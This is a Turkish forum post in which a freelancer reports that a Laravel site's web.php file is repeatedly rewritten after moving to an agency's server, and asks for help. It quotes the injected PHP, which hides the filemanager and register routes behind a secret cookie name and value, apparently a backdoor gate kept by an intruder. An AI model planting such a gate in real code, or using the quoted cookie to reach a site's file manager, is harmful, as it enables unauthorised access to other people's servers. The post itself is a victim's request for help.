Merhabalar, yaklaşık bir senedir freelance olarak destek verdiğim bir sayfa var. Başka sunuculardayken hiçbir sorun yaşamıyorduk ancak yaklaşık 3 ay önce Laravel geliştiriciliği de yapan bir ajansın sahip olduğu sunucuya taşıdık. Bu sunucuya geçtikten sonra web.php dosyası kendi kendine değişmeye başladı ( şu ana kadar 3 kere oldu sonuncusu da dün oldu.) Anında Tüm siteye etki ediyor ve bizim için hayli sorun oluyor. Kimsenin ahını almak istemiyorum ve güvenlik açığı olabilir mi diye de düşünüyorum. Laravel filemanager paketi kullanıyoruz ve önceki değişimde de sadece bu alan diskalifiye bırakılmıştı. bu kod her değişiklikte mutlaka oluyor :
if (strpos($_SERVER['REQUEST_URI'], 'filemanager') !== false) {
if (!isset($_COOKIE['XhRpdPart']) || $_COOKIE['XhRpdPart'] !== 'Kemet168') {
header("HTTP/1.0 404 Not Found");
exit;
}
}
if (strpos($_SERVER['REQUEST_URI'], 'register') !== false) {
if (!isset($_COOKIE['XhRpdPart']) || $_COOKIE['XhRpdPart'] !== 'Kemet168') {
header("HTTP/1.0 404 Not Found");
exit;
}
}
Bunun gibi bir şey daha önce hiç başıma gelmedi. Sunucu sahibini tanımıyorum, ajansı tanımıyorum, kötü bir amaçları olduğunu düşünmüyorum ancak sorunu çözmek zorundayım çünkü bazı değişiklikler beni saatlerce uğraştırıyor, zaman ve emek kaybına yol açıyor.
Bir de bambaşka bir yerin routesi gelmiş gibi duruyor ufak bir ss aldım onu da burada bırakıyorum. Başına daha önce böyle bir şey gelmiş ya da fikri olan arkadaşlar yardımcı olabilirse sevinirim.
Kod Görseli
Bu Görselin bizim mevcut web.php dosyamız ile uzaktan yakından alakası yoktur. Bunu yapıştırmışlar sanki.